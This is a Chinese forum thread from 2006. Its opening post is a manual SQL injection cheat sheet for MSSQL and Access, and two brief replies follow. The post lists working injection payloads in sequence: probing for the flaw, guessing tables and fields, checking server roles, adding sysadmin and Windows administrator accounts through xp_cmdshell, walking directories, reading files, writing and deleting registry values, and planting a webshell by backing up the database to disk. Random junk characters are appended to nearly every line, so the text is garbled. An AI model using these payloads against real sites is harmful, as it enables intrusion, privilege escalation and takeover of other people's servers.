社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3901阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 "TWNit  
  2.初步判断是否是mssql ;and user>0 ^,Sl^ 9K  
y.zS?vv2g  
  3.注入参数是字符'and [查询条件] and ''=' =Vgj=19X(  
~%6GF57gC  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' Q%xvS,oI  
39W"G7n?v  
  5.判断数据库系统 Q k`yK|(0=  
QfI)+pf  
  ;and (select count(*) from sysobjects)>0 mssql \#bk$R@  
6 u3$ .Q  
  ;and (select count(*) from msysobjects)>0 access [qHLo>HaL  
mkfU fG&  
%"R|tlG  
6J|Ee1Ez  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 # j_<iy  
P=)&]Pz  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ^#H%LLt  
1U"Fk3  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 pGZ I697  
t~xp&LQiY  
  9.(1)猜字段的ascii值(access) J!Kk7 !^|  
Y.O/~af  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 zSYh\g"  
zc QFIP  
  (2)猜字段的ascii值(mssql) `-l, `7e'  
T)IH4UO  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 bK)gB!  
+4kBd<0Y  
  10.测试权限结构(mssql) y<|vcg8x  
X-F|&yE~<  
]jUxL=]r  
&yKUf  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- w[>/(R7im  
0Ywqv)gg  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- cLN(yL  
/f!CX|U  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- @"*8nV#  
x(e =@/qp  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- LB<,(dyh  
l vuoVINEp  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- WJG&`PP  
L< MIl[z7  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- EwSE;R -  
G)A5;u\P9  
  ;and 1=(select IS_MEMBER('db_owner'));-- zwAkXj  
_kR,R"lh  
^Zh YW  
* \@u,[,  
  11.添加mssql和系统的帐户 r)jj]$0  
r5!I|E  
  ;exec master.dbo.sp_addlogin username;-- @_&@M~ u  
  ;exec master.dbo.sp_password null,username,password;-- Qt_LBJUWV  
)'{:4MX  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- NX?J  
U>^u!1X  
  ;exec master.dbo.xp_cmdshell 'net user username password N?d4Pu1m  
kRBPl9 9  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $ ]/a/!d  
Z3K~C_0Cnu  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- . bh>_ W_h  
:tu_@3bg-  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 0&1!9-(d  
lNSB "S  
hP4*S^l  
4Fr0/="H  
  12.(1)遍历目录 &e\A v.n@-  
66"-Xf~u  
  ;create table dirs(paths varchar(100), id int) |V2+4b,  
&lYZ=|6  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' f#:7$:{F1  
g;U f?  
  ;and (select top 1 paths from dirs)>0 i%7b)t[y  
gt5  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) b??k|q  
;C8'7  
&xF 2!t`  
dU]>  
  (2)遍历目录 !BHIp7p  
7d0E9t;W  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Zy2@1-z6  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Dm': D  
75`*aAZ3  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 g)+45w*+5  
pU`4bT(w%  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 yQ> *F  
O>^0}  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 pb~&gliW  
c43" o  
N 3)OH6w"  
pA9:1*+;;  
  13.mssql中的存储过程 pQaP9Y{OK  
i)V-q9\  
  xp_regenumvalues 注册表根键, 子键 PgZ~of&  
^F<[5e)M  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 :('7ly!h  
C'ZF#Z  
  xp_regread 根键,子键,键值名 6g@@V=mf  
[{F8+a^  
  ;exec xp_regread oLcOp.8h[  
s1XW}Dw  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 /i+8b(x  
wVD-}n1"  
  xp_regwrite 根键,子键, 值名, 值类型, 值 (o,&P9  
tk5Bb`a  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 h5 Y3 v  
FAAqdK0  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 w$*t.Q*  
=R)9_D6I  
  xp_regdeletevalue 根键,子键,值名 WY%LeC!t  
.$>?2|gRv  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 gP*:>[lR  
2RD os#  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 IAbK]kA  
#`5 M( o  
!7SZZz  
,[IN9W  
  14.mssql的backup创建webshell {9KG06%+  
e.eQZ5n~q`  
  use model iulM8"P  
yKEE @@}\  
  create table cmd(str image); KYY~ YP  
v2 [ l$  
  insert into cmd(str) values (''); *B(na+  
_N~h#(  
  backup database model to disk='c:\l.asp'; UO}Kk*  
*ms?UFV[r  
B[F,D  
x,"'\=|s*  
  15.mssql内置函数 2s,wC!',  
>S5:zz\  
  ;and (select @@version)>0 获得Windows的版本号 ,L&Ka|N0  
hQrO8T?2  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa G0$ 1"9u\w  
_Tyj4t0ElV  
  ;and (select user_name())>0 爆当前系统的连接用户 9="i'nYp  
a3]'%kKp  
  ;and (select db_name())>0 得到当前连接的数据库 9PEjV$0E2  
fRJSo%  
s%`o  
KLlo^1.<  
  16.简洁的webshell _$"qC[.  
8%Zl;;W  
  use model pDD0 QO  
0V*L",9M  
  create table cmd(str image); zw^jIg$  
^1U2&S  
  insert into cmd(str) values (''); }9e4?7  
$53I%.  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八